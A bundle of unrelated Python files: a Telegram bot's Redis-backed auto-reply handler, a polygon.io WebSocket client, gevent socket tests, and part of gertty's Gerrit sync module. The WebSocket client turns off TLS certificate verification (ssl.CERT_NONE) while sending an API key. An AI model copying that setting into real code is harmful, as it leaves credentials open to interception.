ID = redis.hget("{}Nbot:VOreplys".format(BOT_ID),text)
Bot("sendvoice",{"chat_id":chatID,"voice":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:PHreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:PHreplys".format(BOT_ID),text)
Bot("sendphoto",{"chat_id":chatID,"photo":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:DOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:DOreplys".format(BOT_ID),text)
Bot("sendDocument",{"chat_id":chatID,"document":ID,"reply_to_message_id":message.message_id})
if not redis.sismember("{}Nbot:ReplySend".format(BOT_ID),chatID):
if redis.hexists("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),text):
tx = redis.hget("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),text)
try:
rep = {"#cn":"{cn}","#age":"{age}","#fn":"{fn}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(fn=userFN,username=("@"+username or "n"),id=userID,stast=IDrank(redis,userID,chatID,r),cn=title),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if redis.hexists("{}Nbot:{}:STreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:STreplys".format(BOT_ID,chatID),text)
Bot("sendSticker",{"chat_id":chatID,"sticker":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:GFreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:GFreplys".format(BOT_ID,chatID),text)
Bot("sendanimation",{"chat_id":chatID,"animation":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text)
Bot("sendvoice",{"chat_id":chatID,"voice":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:AUreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:AUreplys".format(BOT_ID,chatID),text)
Bot("sendaudio",{"chat_id":chatID,"audio":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:PHreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:PHreplys".format(BOT_ID,chatID),text)
Bot("sendphoto",{"chat_id":chatID,"photo":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:DOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:DOreplys".format(BOT_ID,chatID),text)
Bot("sendDocument",{"chat_id":chatID,"document":ID,"reply_to_message_id":message.message_id})
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateMsgs,args=(client, message,redis))
t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
import traceback
traceback.print_exc()
print(e)
pass
|
websocket_client.py
|
import signal
import ssl
import threading
from typing import Optional, Callable
import websocket
STOCKS_CLUSTER = "stocks"
FOREX_CLUSTER = "forex"
CRYPTO_CLUSTER = "crypto"
class WebSocketClient:
DEFAULT_HOST = "socket.polygon.io"
# TODO: Either an instance of the client couples 1:1 with the cluster or an instance of the Client couples 1:3 with
# the 3 possible clusters (I think I like client per, but then a problem is the user can make multiple clients for
# the same cluster and that's not desirable behavior,
# somehow keeping track with multiple Client instances will be the difficulty)
def __init__(self, cluster: str, auth_key: str, process_message: Optional[Callable[[str], None]] = None,
on_close: Optional[Callable[[websocket.WebSocketApp], None]] = None,
on_error: Optional[Callable[[websocket.WebSocketApp, str], None]] = None):
self._host = self.DEFAULT_HOST
self.url = f"wss://{self._host}/{cluster}"
self.ws: websocket.WebSocketApp = websocket.WebSocketApp(self.url, on_open=self._default_on_open(),
on_close=self._default_on_close,
on_error=self._default_on_error,
on_message=self._default_on_message())
self.auth_key = auth_key
self.process_message = process_message
self.ws.on_close = on_close
self.ws.on_error = on_error
# being authenticated is an event that must occur before any other action is sent to the server
self._authenticated = threading.Event()
# self._run_thread is only set if the client is run asynchronously
self._run_thread: Optional[threading.Thread] = None
# TODO: this probably isn't great design.
# If the user defines their own signal handler then this will get overwritten.
# We still need to make sure that killing, terminating, interrupting the program closes the connection
# signal.signal(signal.SIGINT, self._cleanup_signal_handler())
# signal.signal(signal.SIGTERM, self._cleanup_signal_handler())
def run(self):
self.ws.run_forever(skip_utf8_validation=True, sslopt={"cert_reqs": ssl.CERT_NONE})
def run_async(self):
self._run_thread = threading.Thread(target=self.run)
self._run_thread.start()
def close_connection(self):
self.ws.close()
if self._run_thread:
self._run_thread.join()
def subscribe(self, *params):
# TODO: make this a decorator or context manager
self._authenticated.wait()
sub_message = '{"action":"subscribe","params":"%s"}' % self._format_params(params)
self.ws.send(sub_message)
def unsubscribe(self, *params):
# TODO: make this a decorator or context manager
self._authenticated.wait()
sub_message = '{"action":"unsubscribe","params":"%s"}' % self._format_params(params)
self.ws.send(sub_message)
def _cleanup_signal_handler(self):
return lambda signalnum, frame: self.close_connection()
def _authenticate(self, ws):
ws.send('{"action":"auth","params":"%s"}' % self.auth_key)
self._authenticated.set()
@staticmethod
def _format_params(params):
return ",".join(params)
@property
def process_message(self):
return self.__process_message
@process_message.setter
def process_message(self, pm):
if pm:
self.__process_message = pm
self.ws.on_message = lambda ws, message: self.__process_message(message)
def _default_on_message(self):
return lambda ws, message: self._default_process_message(message)
@staticmethod
def _default_process_message(message):
print(message)
def _default_on_open(self):
def f(ws):
self._authenticate(ws)
return f
@staticmethod
def _default_on_error(ws, error):
print("error:", error)
@staticmethod
def _default_on_close(ws):
print("### closed ###")
|
test__socket.py
|
from __future__ import print_function
from __future__ import absolute_import
# This line can be commented out so that most tests run with the
# system socket for comparison.
from gevent import monkey; monkey.patch_all()
import sys
import array
import socket
import time
import unittest
from functools import wraps
from gevent._compat import reraise
import gevent.testing as greentest
from gevent.testing import six
from gevent.testing import LARGE_TIMEOUT
from gevent.testing import support
from gevent.testing import params
from gevent.testing.sockets import tcp_listener
from gevent.testing.skipping import skipWithoutExternalNetwork
# we use threading on purpose so that we can test both regular and
# gevent sockets with the same code
from threading import Thread as _Thread
from threading import Event
errno_types = int
class Thread(_Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
self.terminal_exc = None
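# Wrap the target so any exception escaping it is recorded here; the test
# re-raises it on the main thread later via reraise(*server.terminal_exc).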
@wraps(target)
def errors_are_fatal(*args, **kwargs):
try:
return target(*args, **kwargs)
except: # pylint:disable=bare-except
self.terminal_exc = sys.exc_info()
raise
_Thread.__init__(self, target=errors_are_fatal, **kwargs)
self.start()
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if not isinstance(long_data, bytes):
long_data = long_data.encode('ascii')
def setUp(self):
super(TestTCP, self).setUp()
if '-v' in sys.argv:
printed = []
try:
from time import perf_counter as now
except ImportError:
from time import time as now
def log(*args):
if not printed:
print()
printed.append(1)
print("\t ->", now(), *args)
orig_cot = self._close_on_teardown
def cot(o):
log("Registering for teardown", o)
def c():
log("Closing on teardown", o)
o.close()
orig_cot(c)
return o
self._close_on_teardown = cot
else:
def log(*_args):
"Does nothing"
self.log = log
self.listener = self._close_on_teardown(self._setup_listener())
# It is important to watch the lifetimes of socket objects and
# ensure that:
# (1) they are closed; and
# (2) *before* the next test begins.
#
# For example, it's a bad bad thing to leave a greenlet running past the
# scope of the individual test method if that greenlet will close
# a socket object --- especially if that socket object might also have been
# closed explicitly.
#
# On Windows, we've seen issue with filenos getting reused while something
# still thinks they have the original fileno around. When they later
# close that fileno, a completely unrelated object is closed.
self.port = self.listener.getsockname()[1]
def _setup_listener(self):
return tcp_listener()
def create_connection(self, host=None, port=None, timeout=None,
blocking=None):
sock = self._close_on_teardown(socket.socket())
sock.connect((host or params.DEFAULT_CONNECT, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return sock
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
# pylint:disable=too-many-locals,too-many-branches,too-many-statements
log = self.log
log("Sendall", client_method)
read_data = []
accepted_event = Event()
def accept_and_read():
log("accepting", self.listener)
conn, _ = self.listener.accept()
try:
with conn.makefile(mode='rb') as r:
log("accepted on server", conn)
accepted_event.set()
log("reading")
read_data.append(r.read())
log("done reading")
del r
finally:
conn.close()
del conn
server = Thread(target=accept_and_read)
try:
log("creating client connection")
client = self.create_connection(**client_args)
# We seem to have a buffer stuck somewhere on appveyor?
# https://ci.appveyor.com/project/denik/gevent/builds/27320824/job/bdbax88sqnjoti6i#L712
should_unwrap = hasattr(client, 'unwrap') and greentest.PY37 and greentest.WIN
# The implicit reference-based nastiness of Python 2
# sockets interferes, especially when using SSL sockets.
# The best way to get a decent FIN to the server is to shutdown
# the output. Doing that on Python 3, OTOH, is contraindicated
# except on PyPy.
should_shutdown = greentest.PY2 or greentest.PYPY
# It's important to wait for the server to fully accept before
# we shutdown and close the socket. In SSL mode, the number
# and timing of data exchanges to complete the handshake and
# thus exactly when greenlet switches occur, varies by TLS version.
#
# It turns out that on < TLS1.3, we were getting lucky and the
# server was the greenlet that raced ahead and blocked in r.read()
# before the client returned from create_connection().
#
# But when TLS 1.3 was deployed (OpenSSL 1.1), the *client* was the
# one that raced ahead while the server had yet to return from
# self.listener.accept(). So the client sent the data to the socket,
# and closed, before the server could do anything, and the server,
# when it got switched to by server.join(), found its new socket
# dead.
accepted_event.wait()
log("accepted", client)
try:
getattr(client, client_method)(data)
except:
import traceback; traceback.print_exc()
# unwrapping might not work after this because we're in
# a bad state.
if should_unwrap:
client.shutdown(socket.SHUT_RDWR)
should_unwrap = False
should_shutdown = False
raise
finally:
log("shutdown")
if should_shutdown:
client.shutdown(socket.SHUT_RDWR)
elif should_unwrap:
try:
client.unwrap()
except OSError as e:
if greentest.PY37 and greentest.WIN and e.errno == 0:
# ? 3.7.4 on AppVeyor sometimes raises
# "OSError[errno 0] Error" here, which doesn't make
# any sense.
pass
else:
raise
log("closing")
client.close()
finally:
server.join(10)
assert not server.is_alive()
if server.terminal_exc:
reraise(*server.terminal_exc)
if match_data is None:
match_data = self.long_data
self.assertEqual(read_data, [match_data])
def test_sendall_str(self):
self._test_sendall(self.long_data)
if six.PY2:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
remote_client, _ = self.listener.accept()
self._close_on_teardown(remote_client)
# start reading, then, while reading, start writing. the reader should not hang forever
sender = Thread(target=remote_client.sendall,
args=((b't' * N),))
try:
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
finally:
sender.join()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = self._close_on_teardown(client.makefile())
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
def accept():
# make sure the conn object stays alive until the end;
# premature closing triggers a ResourceWarning and
# EOF on the client.
conn, _ = self.listener.accept()
self._close_on_teardown(conn)
acceptor = Thread(target=accept)
client = self.create_connection()
try:
client.settimeout(1)
start = time.time()
with self.assertRaises(self.TIMEOUT_ERROR):
client.recv(1024)
took = time.time() - start
self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
finally:
acceptor.join()
# Subclasses can disable this
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
# In 2018, this needs to be increased *again* as a smaller value was
# still often being sent.
_test_sendall_data = b'hello' * 100000000
# This doesn't make much sense...why are we really skipping this?
@greentest.skipOnWindows("On Windows send() accepts whatever is thrown at it")
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
with self.assertRaises(self.TIMEOUT_ERROR):
client.sendall(self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
self.assertTimeWithinRange(took, 0.09, 0.2)
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.flush()
fd.close()
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
# Closing the socket doesn't close the file
client_file = client.makefile(mode='rb')
client.close()
line = client_file.readline()
self.assertEqual(line, b'hello\n')
self.assertEqual(client_file.read(), b'')
client_file.close()
finally:
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, _ = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
finally:
acceptor.join()
def test_attributes(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
self.assertEqual(socket.AF_INET, s.family)
self.assertEqual(socket.SOCK_DGRAM, s.type)
self.assertEqual(0, s.proto)
if hasattr(socket, 'SOCK_NONBLOCK'):
s.settimeout(1)
self.assertEqual(socket.SOCK_DGRAM, s.type)
s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
try:
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
finally:
std_socket.close()
s.close()
def test_connect_ex_nonblocking_bad_connection(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
ret = s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, support.find_unused_port()))
self.assertIsInstance(ret, errno_types)
finally:
s.close()
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_connect_ex_gaierror(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
with self.assertRaises(socket.gaierror):
s.connect_ex(('foo.bar.fizzbuzz', support.find_unused_port()))
finally:
s.close()
def test_connect_ex_nonblocking_overflow(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
with self.assertRaises(OverflowError):
s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, 65539))
finally:
s.close()
@unittest.skipUnless(hasattr(socket, 'SOCK_CLOEXEC'),
"Requires SOCK_CLOEXEC")
def test_connect_with_type_flags_ignored(self):
# Issue 944
# If we have SOCK_CLOEXEC or similar, we shouldn't be passing
# them through to the getaddrinfo call that connect() makes
SOCK_CLOEXEC = socket.SOCK_CLOEXEC # pylint:disable=no-member
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM | SOCK_CLOEXEC)
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close()
acceptor = Thread(target=accept_once)
try:
s.connect((params.DEFAULT_CONNECT, self.port))
fd = s.makefile(mode='rb')
self.assertEqual(fd.readline(), b'hello\n')
fd.close()
s.close()
finally:
acceptor.join()
class TestCreateConnection(greentest.TestCase):
__timeout__ = LARGE_TIMEOUT
def test_refuses(self, **conn_args):
connect_port = support.find_unused_port()
with self.assertRaisesRegex(
socket.error,
# We really expect "connection refused". It's unclear
# where/why we would get '[errno -2] name or service not known'
# but it seems some systems generate that.
# https://github.com/gevent/gevent/issues/1389
# Somehow extremly rarely we've also seen 'address already in use',
# which makes even less sense.
'refused|not known|already in use'
):
socket.create_connection(
(greentest.DEFAULT_BIND_ADDR, connect_port),
timeout=30,
**conn_args
)
def test_refuses_from_port(self):
source_port = support.find_unused_port()
# Usually we don't want to bind/connect to '', but
# using it as the source is required if we don't want to hang,
# at least on some systems (OS X)
self.test_refuses(source_address=('', source_port))
@greentest.ignores_leakcheck
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_base_exception(self):
# such as a GreenletExit or a gevent.timeout.Timeout
class E(BaseException):
pass
class MockSocket(object):
created = ()
closed = False
def __init__(self, *_):
MockSocket.created += (self,)
def connect(self, _):
raise E(_)
def close(self):
self.closed = True
def mockgetaddrinfo(*_):
return [(1, 2, 3, 3, 5),]
import gevent.socket as gsocket
# Make sure we're monkey patched
self.assertEqual(gsocket.create_connection, socket.create_connection)
orig_socket = gsocket.socket
orig_getaddrinfo = gsocket.getaddrinfo
try:
gsocket.socket = MockSocket
gsocket.getaddrinfo = mockgetaddrinfo
with self.assertRaises(E):
socket.create_connection(('host', 'port'))
self.assertEqual(1, len(MockSocket.created))
self.assertTrue(MockSocket.created[0].closed)
finally:
MockSocket.created = ()
gsocket.socket = orig_socket
gsocket.getaddrinfo = orig_getaddrinfo
class TestFunctions(greentest.TestCase):
@greentest.ignores_leakcheck
# Creating new types in the function takes a cycle to cleanup.
def test_wait_timeout(self):
# Issue #635
import gevent.socket
import gevent._socketcommon
class io(object):
callback = None
def start(self, *_args):
gevent.sleep(10)
with self.assertRaises(gevent.socket.timeout):
gevent.socket.wait(io(), timeout=0.01) # pylint:disable=no-member
def test_signatures(self):
# https://github.com/gevent/gevent/issues/960
exclude = []
if greentest.PYPY:
# Up through at least PyPy 5.7.1, they define these as
# gethostbyname(host), whereas the official CPython argument name
# is hostname. But cpython doesn't allow calling with keyword args.
# Likewise for gethostbyaddr: PyPy uses host, cpython uses ip_address
exclude.append('gethostbyname')
exclude.append('gethostbyname_ex')
exclude.append('gethostbyaddr')
self.assertMonkeyPatchedFuncSignatures('socket', exclude=exclude)
class TestSocket(greentest.TestCase):
def test_shutdown_when_closed(self):
# https://github.com/gevent/gevent/issues/1089
# we once raised an AttributeError.
s = socket.socket()
s.close()
with self.assertRaises(socket.error):
s.shutdown(socket.SHUT_RDWR)
if __name__ == '__main__':
greentest.main()
|
sync.py
|
# Copyright 2014 OpenStack Foundation
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import errno
import logging
import math
import os
import re
import threading
import json
import time
import datetime
import dateutil.parser
try:
import ordereddict
except ImportError:
pass
import requests
import requests.utils
import six
from six.moves import queue
from six.moves.urllib import parse as urlparse
import gertty.version
from gertty import gitrepo
from gertty.auth import FormAuth
HIGH_PRIORITY=0
NORMAL_PRIORITY=1
LOW_PRIORITY=2
TIMEOUT=30
CLOSED_STATUSES = ['MERGED', 'ABANDONED']
class OfflineError(Exception):
pass
class MultiQueue(object):
def __init__(self, priorities):
try:
self.queues = collections.OrderedDict()
except AttributeError:
self.queues = ordereddict.OrderedDict()
for key in priorities:
self.queues[key] = collections.deque()
self.condition = threading.Condition()
self.incomplete = []
def qsize(self):
count = 0
self.condition.acquire()
try:
for queue in self.queues.values():
count += len(queue)
return count + len(self.incomplete)
finally:
self.condition.release()
def put(self, item, priority):
added = False
self.condition.acquire()
try:
if item not in self.queues[priority]:
self.queues[priority].append(item)
added = True
self.condition.notify()
finally:
self.condition.release()
return added
def get(self):
self.condition.acquire()
try:
while True:
for queue in self.queues.values():
try:
ret = queue.popleft()
self.incomplete.append(ret)
return ret
except IndexError:
pass
self.condition.wait()
finally:
self.condition.release()
def find(self, klass, priority):
results = []
self.condition.acquire()
try:
for item in self.queues[priority]:
if isinstance(item, klass):
results.append(item)
finally:
self.condition.release()
return results
def complete(self, item):
self.condition.acquire()
try:
if item in self.incomplete:
self.incomplete.remove(item)
finally:
self.condition.release()
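# Usage sketch (illustrative):
#   q = MultiQueue([HIGH_PRIORITY, NORMAL_PRIORITY, LOW_PRIORITY])
#   q.put(task, NORMAL_PRIORITY)  # de-duplicated within a priority level
#   item = q.get()                # blocks until an item is available
#   q.complete(item)              # drop it from the incomplete list when done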
class UpdateEvent(object):
def updateRelatedChanges(self, session, change):
related_change_keys = set()
related_change_keys.add(change.key)
for revision in change.revisions:
parent = session.getRevisionByCommit(revision.parent)
if parent:
related_change_keys.add(parent.change.key)
for child in session.getRevisionsByParent(revision.commit):
related_change_keys.add(child.change.key)
self.related_change_keys = related_change_keys
class ProjectAddedEvent(UpdateEvent):
def __repr__(self):
return '<ProjectAddedEvent project_key:%s>' % (
self.project_key,)
def __init__(self, project):
self.project_key = project.key
class ChangeAddedEvent(UpdateEvent):
def __repr__(self):
return '<ChangeAddedEvent project_key:%s change_key:%s>' % (
self.project_key, self.change_key)
def __init__(self, change):
self.project_key = change.project.key
self.change_key = change.key
self.related_change_keys = set()
self.review_flag_changed = True
self.status_changed = True
self.held_changed = False
class ChangeUpdatedEvent(UpdateEvent):
def __repr__(self):
return '<ChangeUpdatedEvent project_key:%s change_key:%s review_flag_changed:%s status_changed:%s>' % (
self.project_key, self.change_key, self.review_flag_changed, self.status_changed)
def __init__(self, change):
self.project_key = change.project.key
self.change_key = change.key
self.related_change_keys = set()
self.review_flag_changed = False
self.status_changed = False
self.held_changed = False
class Task(object):
def __init__(self, priority=NORMAL_PRIORITY):
self.log = logging.getLogger('gertty.sync')
self.priority = priority
self.succeeded = None
self.event = threading.Event()
self.tasks = []
self.results = []
def complete(self, success):
self.succeeded = success
self.event.set()
def wait(self, timeout=None):
self.event.wait(timeout)
return self.succeeded
def __eq__(self, other):
raise NotImplementedError()
class SyncOwnAccountTask(Task):
def __repr__(self):
return '<SyncOwnAccountTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('accounts/self')
sync.account_id = remote['_account_id']
with app.db.getSession() as session:
session.getAccountByID(remote['_account_id'],
remote.get('name'),
remote.get('username'),
remote.get('email'))
class GetVersionTask(Task):
def __repr__(self):
return '<GetVersionTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
version = sync.get('config/server/version')
sync.setRemoteVersion(version)
class SyncProjectListTask(Task):
def __repr__(self):
return '<SyncProjectListTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('projects/?d')
remote_keys = set(remote.keys())
with app.db.getSession() as session:
local = {}
for p in session.getProjects():
local[p.name] = p
local_keys = set(local.keys())
for name in local_keys-remote_keys:
session.delete(local[name])
for name in remote_keys-local_keys:
p = remote[name]
project = session.createProject(name,
description=p.get('description', ''))
self.log.info("Created project %s", project.name)
self.results.append(ProjectAddedEvent(project))
class SyncSubscribedProjectBranchesTask(Task):
def __repr__(self):
return '<SyncSubscribedProjectBranchesTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
projects = session.getProjects(subscribed=True)
for p in projects:
sync.submitTask(SyncProjectBranchesTask(p.name, self.priority))
class SyncProjectBranchesTask(Task):
branch_re = re.compile(r'refs/heads/(.*)')
def __init__(self, project_name, priority=NORMAL_PRIORITY):
super(SyncProjectBranchesTask, self).__init__(priority)
self.project_name = project_name
def __repr__(self):
return '<SyncProjectBranchesTask %s>' % (self.project_name,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_name == self.project_name):
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('projects/%s/branches/' % urlparse.quote_plus(self.project_name))
remote_branches = set()
for x in remote:
m = self.branch_re.match(x['ref'])
if m:
remote_branches.add(m.group(1))
with app.db.getSession() as session:
local = {}
project = session.getProjectByName(self.project_name)
for branch in project.branches:
local[branch.name] = branch
local_branches = set(local.keys())
for name in local_branches-remote_branches:
session.delete(local[name])
self.log.info("Deleted branch %s from project %s in local DB.", name, project.name)
for name in remote_branches-local_branches:
project.createBranch(name)
self.log.info("Added branch %s to project %s in local DB.", name, project.name)
class SyncSubscribedProjectsTask(Task):
def __repr__(self):
return '<SyncSubscribedProjectsTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
keys = [p.key for p in session.getProjects(subscribed=True)]
for i in range(0, len(keys), 10):
t = SyncProjectTask(keys[i:i+10], self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = SyncQueriedChangesTask('owner', 'is:owner', self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = SyncQueriedChangesTask('starred', 'is:starred', self.priority)
self.tasks.append(t)
sync.submitTask(t)
class SyncProjectTask(Task):
def __init__(self, project_keys, priority=NORMAL_PRIORITY):
super(SyncProjectTask, self).__init__(priority)
if type(project_keys) == int:
project_keys = [project_keys]
self.project_keys = project_keys
def __repr__(self):
return '<SyncProjectTask %s>' % (self.project_keys,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_keys == self.project_keys):
return True
return False
def run(self, sync):
app = sync.app
now = datetime.datetime.utcnow()
queries = []
with app.db.getSession() as session:
for project_key in self.project_keys:
project = session.getProject(project_key)
query = 'q=project:%s' % project.name
if project.updated:
# Allow 4 seconds for request time, etc.
query += ' -age:%ss' % (int(math.ceil((now-project.updated).total_seconds())) + 4,)
else:
query += ' status:open'
queries.append(query)
changes = sync.query(queries)
change_ids = [c['id'] for c in changes]
with app.db.getSession() as session:
# Winnow the list of IDs to only the ones in the local DB.
change_ids = session.getChangeIDs(change_ids)
for c in changes:
                # For now, just sync open changes or changes already
                # in the db; optionally we could sync all changes ever.
if c['id'] in change_ids or (c['status'] not in CLOSED_STATUSES):
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
for key in self.project_keys:
sync.submitTask(SetProjectUpdatedTask(key, now, priority=self.priority))
class SetProjectUpdatedTask(Task):
def __init__(self, project_key, updated, priority=NORMAL_PRIORITY):
super(SetProjectUpdatedTask, self).__init__(priority)
self.project_key = project_key
self.updated = updated
def __repr__(self):
return '<SetProjectUpdatedTask %s %s>' % (self.project_key, self.updated)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_key == self.project_key and
other.updated == self.updated):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
project = session.getProject(self.project_key)
project.updated = self.updated
class SyncQueriedChangesTask(Task):
def __init__(self, query_name, query, priority=NORMAL_PRIORITY):
super(SyncQueriedChangesTask, self).__init__(priority)
self.query_name = query_name
self.query = query
def __repr__(self):
return '<SyncQueriedChangesTask %s>' % self.query_name
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.query_name == self.query_name and
other.query == self.query):
return True
return False
def run(self, sync):
app = sync.app
now = datetime.datetime.utcnow()
with app.db.getSession() as session:
sync_query = session.getSyncQueryByName(self.query_name)
query = 'q=%s' % self.query
if sync_query.updated:
# Allow 4 seconds for request time, etc.
query += ' -age:%ss' % (int(math.ceil((now-sync_query.updated).total_seconds())) + 4,)
else:
query += ' status:open'
for project in session.getProjects(subscribed=True):
query += ' -project:%s' % project.name
changes = []
sortkey = ''
done = False
offset = 0
while not done:
# We don't actually want to limit to 500, but that's the server-side default, and
# if we don't specify this, we won't get a _more_changes flag.
q = 'changes/?n=500%s&%s' % (sortkey, query)
self.log.debug('Query: %s ' % (q,))
batch = sync.get(q)
done = True
if batch:
changes += batch
if '_more_changes' in batch[-1]:
done = False
if '_sortkey' in batch[-1]:
sortkey = '&N=%s' % (batch[-1]['_sortkey'],)
else:
offset += len(batch)
sortkey = '&start=%s' % (offset,)
change_ids = [c['id'] for c in changes]
with app.db.getSession() as session:
# Winnow the list of IDs to only the ones in the local DB.
change_ids = session.getChangeIDs(change_ids)
for c in changes:
                # For now, just sync open changes or changes already
                # in the db; optionally we could sync all changes ever.
if c['id'] in change_ids or (c['status'] not in CLOSED_STATUSES):
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
sync.submitTask(SetSyncQueryUpdatedTask(self.query_name, now, priority=self.priority))
class SetSyncQueryUpdatedTask(Task):
def __init__(self, query_name, updated, priority=NORMAL_PRIORITY):
super(SetSyncQueryUpdatedTask, self).__init__(priority)
self.query_name = query_name
self.updated = updated
def __repr__(self):
return '<SetSyncQueryUpdatedTask %s %s>' % (self.query_name, self.updated)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.query_name == self.query_name and
other.updated == self.updated):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
sync_query = session.getSyncQueryByName(self.query_name)
sync_query.updated = self.updated
